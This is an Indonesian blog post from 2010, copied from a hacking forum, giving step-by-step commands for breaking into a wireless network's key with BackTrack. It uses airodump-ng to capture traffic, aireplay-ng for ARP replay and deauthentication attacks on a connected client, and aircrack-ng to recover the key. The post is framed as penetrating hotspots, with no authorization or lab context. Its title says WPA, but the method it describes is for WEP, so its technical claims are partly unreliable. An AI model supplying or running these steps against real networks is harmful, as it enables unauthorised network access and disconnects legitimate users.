Selasa, 26 Januari 2010

Menembus Pertahanan WPA key Dengan BackTrack

1.Jalankan BackTrack.
2.Reset driver wireless. Ketikkan:
#airmon-ng -> cek interface ath yang aktif
#airmon-ng stop ath0
#airmon-ng stop ath1 -> bila ath1 aktif
#airmon-ng start wifi0

3.Buka 3 buah console.
4.Console 1, ketikkan:
#airodump-ng ath0 -> scanning hotspot yang aktif.
#airodump-ng --channel 11 --bssid 00:0E:2E:C2:2C:0E -w target ath0

Keterangan:
Proses ini untuk mengcapture informasi dapat membantu dalam menembus WEP Key.
--bssid -> MAC-Address dari AP yang akan di crack
-w target -> hasil capture ini akan disimpan di file yang namanya target

5.Console 2, ketikkan:
Untuk membantu menciptakan pengumpulan paket data
#aireplay-ng --arpreplay -b 00:0E:2E:C2:2C:0E -h 00:0E:2E:C1:1E:83 ath0

Keterangan:

-b -> MAC-Address dari AP.
-h -> MAC-Address dari client yang aktif terhubung ke AP.

6.Console 3, ketikkan:
Untuk mempercepat pengumpulan paket data, dilakukan serangan deauthentication ke client.

#aireplay-ng --deauth 2 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0

Keterangan:

-c -> MAC-Address dari Client
-a -> MAC-Address dari AP

7.Setelah terkumpul paket data yang cukup, dilakukan cracking:
#aircrack-ng target*.cap

Dan selanjutnya akan terlihat WPA Key hasil pencarian kita.
download backtrack klik disini

sumber : http://devilzc0de.forumotion.com/wirelss-free-hotspot-f9/menembus-pertahanan-wep-keys-t96.htm

Tidak ada komentar:

Posting Komentar